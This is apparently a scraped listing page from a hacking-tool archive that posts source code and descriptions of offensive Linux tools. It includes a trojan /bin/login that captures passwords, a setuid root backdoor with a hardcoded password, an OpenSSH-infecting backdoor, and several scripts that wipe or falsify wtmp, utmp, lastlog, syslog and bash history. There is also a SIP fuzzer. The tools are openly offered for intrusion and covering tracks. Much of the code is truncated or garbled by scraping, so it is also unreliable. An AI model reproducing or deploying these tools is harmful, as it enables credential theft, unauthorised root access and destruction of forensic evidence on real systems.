Linux
tl0gin.c
3 February, 2014 - 15:26 — cisc0ninjaTrojan /bin/login.
* *
* Greetz: BashX, roadhouse, sinner, decodi, r0ot, hts, *
* midnight, behael, dacker, seed, m4st, mor_PH_eus, *
* eSc2, anjinh0, bionatus.. *
* #DNH, #ESFINGE, #FEANOR at BRASNET *
* *
* Mail-me: <a href="mailto:[email protected]">[email protected]</a> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>
/* Error */
#define ERROR1 "Login incorrect"
/* Arquive */
#define ARQUI "/tmp/.tl0101"
/* Others */
#define MAX 500
#define ERRO -1
#define LOGIN "/bin/login"
void banner();
void loga();
void retorna();
int pega_info();
int grava_arq(char login[100], char passwd[100]);
char sys_name[100];
char sys_release[100];
int main()
{
FILE *fp;
signal(SIGINT, retorna);
signal(SIGSTOP, retorna);
signal(SIGQUIT, retorna);
loga();
return();
}
void loga() {
int pid;
char login[MAX], passwd[MAX], esconde[MAX], hostname[MAX];
char *pass;
pid = getppid();
gethostname(hostname, sizeof(hostname));
for(;;) {
for(;;) {
PRIMEIRO:
banner();
SEGUNDO:
printf("%s login: ", hostname);
fflush(stdout);
gets(login);
if(strcmp(login, "") != )
break;
else
goto PRIMEIRO;
}
pass = (char *)getpass ("Password: ");
printf("%s\n\n", ERROR1);
if(strlen(login) >= 3)
break;
else
goto SEGUNDO;
}
grava_arq(login, pass);
kill(pid, 9);
execl(LOGIN, "", NULL);
}
int pega_info() {
struct utsname info;
if(uname(&info) == -1) {
perror("uname");
return -1;
}
sprintf(sys_name, "%s", info.sysname);
sprintf(sys_release, "%s", info.release);
}
SIP Army Knife
3 February, 2014 - 15:22 — cisc0ninjaSIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.
#SIP VoIP Protocol Fuzzer
#Created: Blake Cornell
use strict;
#use warnings; LOTS OF WARNING ____ SOLVE THIS AND INCREASE EFFICIENTY
use IO::Select;
use IO::Socket;
use IO::Socket::INET;
use Getopt::Long;
use Pod::Usage;
use Time::HiRes qw( alarm );
use Digest::MD4 qw( md4_hex );
use Digest::MD5 qw( md5_hex );
use Digest::CRC qw( crc32 crc16 );
use HTML::Entities;
my @timeoutDetection = ();
my @md5Requests = ();
my @md4Requests = ();
my @crc32Requests = ();
my @crc16Requests = ();
my $packetCount = ;
my $socketType='';
my $result = GetOptions('host|h=s' => \(my $host = ''),
'dport|p=s' => \(my $dport = ''),
'sport|p=s' => \(my $sport = ''),
'verbose|v' => \(my $verbose),
'veryverbose|vv' => \(my $veryVerbose),
'connection|c' => \(my $connection), #to listen to response or not
'density|d=s' => \(my $density = ), #determines how many mutations to use
'timeout|t=s' => \(my $timeout = .1),
'count' => \(my $countTests = ), #counts the number of packets to test
'md4' => \(my $md4), #can cause timeouts
'md5' => \(my $md5), #can cause timeouts
'crc32' => \(my $crc32), #can cause timeouts
'crc16' => \(my $crc16), #can cause timeouts
'start=s' => \(my $startPosition), #if set, then start at this position
'stringFormats' => \(my $stringFormats),
'stringOverflows' => \(my $stringOverflows),
'integerFormats' => \(my $integerFormats),
'injectHeaders' => \(my $injectHeaders),
'xss' => \(my $xss),
'sqli' => \(my $sqli),
'callId' => \(my $callId), #call id is incremented
'detectVersion' => \(my $detectVersion),
'getOptions' => \(my $getOptions),
'help' => \(my $help),
'proto=s' => \(my $proto),
Linux Log Eraser
3 February, 2014 - 15:13 — cisc0ninjaLinux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.
Last Door Log Wiper
3 February, 2014 - 15:07 — cisc0ninjaLast Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.
| |Linux
|<Last|Door>|Root-
| --------- |Backdoor
| O |&
| |Log-
| |Cleaner
|___________|~r0ng
Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)
Release Dec 2012 -V1
For a full writeup of the program, please visit my blog, URL above.
[+] What is it?
It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.
[+] Features?
- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
- Search string replace with new string (e.g. change your ip in the logs)
- Search string delete string
- Search string delete line
- Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
- If you don't logout prior to the process starting, the file search process will be displayed
- If you do logout prior to the process starting this will allow your .bash_history to refresh
and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?
- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)
- non-rootuser:~# /bin/LastDoor (run!)
whitecat.c
3 February, 2014 - 15:03 — cisc0ninjaWhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
* This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
* It supports perl compatible regular expressions and cleans any binary and
* text log files (just correct source a little). WhiteCat is designed for
* any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
* Use it only for educational purpose.
* Don't forget to visit our site and my homepage for new releases:
* <a href="http://hellknights.void.ru<br />
" title="http://hellknights.void.ru<br />
">http://hellknights.void.ru<br />
</a> * <a href="http://shados.0x48k.cc<br />
" title="http://shados.0x48k.cc<br />
">http://shados.0x48k.cc<br />
</a> * Also, you can mail me any bugs or suggestions:
* <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ real.xakep.ru
* <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ 0x48k.cc
*
* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>
#ifndef UTMP_FILE
#define UTMP_FILE "/var/run/utmp"
#endif
#ifndef WTMP_FILE
#define WTMP_FILE "/var/log/wtmp"
#endif
Guru-Antilog.sh
3 February, 2014 - 14:58 — cisc0ninjaA bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo " Guru-Antilog c0ded By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo " Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ? "
read word
word=$word
echo -n " What's the Fake ip y0 want using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
echo " i can't find access_log "
SSHeater
3 February, 2014 - 14:56 — cisc0ninjaSSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.
c1zc0-ban
3 February, 2014 - 14:49 — cisc0ninjaSimple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.
rsh-v2.c
3 February, 2014 - 14:45 — cisc0ninjaUnix log cleaner that also checks to see if root is logged in.
/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PASS "c1zk0"
#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"
int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();
int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);
if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}
int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;
if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}
if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}
nabi2.c
3 February, 2014 - 14:42 — cisc0ninjaNabi version 2.0 - Advanced /var log wiper for Linux.
Advanced /var log wiper for linux
nabi ver 2 ( friendly zap2.c )
Release Date:
nabi ver 2 - 3.8 2006 (Wed)
nabi ver 1 - 1.15 2006 (Sun)
1: zap2)
# ./nabi -z root
2: history cleanup)
# ./nabi -h
3: string change)
# ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
# ./nabi -r 'pts/1' 'tty/0' ( yo ~! )
Tested on:
- Debian 3.0r1
- RH 9.0
- Fedora core 2
..
CHANGED:
- add program option parser for split features on this file.
- erased minor version number of this program.
BUG FIXED:
- when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
see escape_slash().
comment:
i become a curious guy when i'm typing some code. what about you all?
for more useful toolkit. brb!
*/
#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define MAX_PATH 1024
#define MAX_DEPTH 128
#define PROGRAM "Nabi ver 2 ( <a href="mailto:[email protected]">[email protected]</a> )"
/*
#define DEBUG
*/
/* proto type */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);
/* linked-list stuffs for file list */
struct file_list
{
struct file_list *next;
int depth;
char d_name[MAX_PATH];
} *head, *tail;
static char root_dir[] = "/var";
int main(int argc, char *argv[])
{
struct dirent *dp;
